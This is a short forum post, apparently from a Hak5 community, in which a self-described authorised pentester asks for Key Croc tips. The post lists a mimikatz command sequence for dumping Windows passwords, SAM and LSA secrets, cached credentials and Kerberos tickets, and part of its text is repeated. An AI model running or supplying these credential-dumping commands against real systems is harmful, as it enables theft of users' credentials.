About To Receive This Product - Any Advice or Tips?

Spraggins Designs

I already own the Bash Bunny Mark II, WiFi Pineapple Mark VII, and Ruber Ducky Deluxe.
I already am OSCP certified and run a clean Kali Linux 2021.3 right now.
I have enjoyed helping contribute to some of the code over at Bash Bunny Mark II GitHub Repository

I also work in IT and Web Design/Marketing at my college, and with my OSCP, they allow me to pentest their networks and devices.
Just today, I was able to use mimikatz on three different desktops running Windows 10 and Sophos.
I managed to dump three logs, with: This was quite amazing. I had to change a few things around. Still, ultimately I only needed the BB to carry the executable as a USB Drive, haha.
Anyway, any suggestions or advice for the Key Croc? I got it because I do not see anything else worth getting at the moment, and it also is in stock.

privilege::debug
log filename.log
token::elevate
sekurlsa::logonpasswords
sekurlsa::tickets /export
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert

This was quite amazing. I had to change a few things around. Still, ultimately I only needed the BB to carry the executable as a USB Drive, haha.
Anyway, any suggestions or advice for the Key Croc? I got it because I do not see anything else worth getting at the moment, and it also is in stock. 
I also dumped 43 .kirbi files as well.
JSWBgyN.png

Not sure I follow the post fully. What does the Mimicatz thing (and other inserted info) have to do with your question about what to do with the soon to be delivered Key Croc?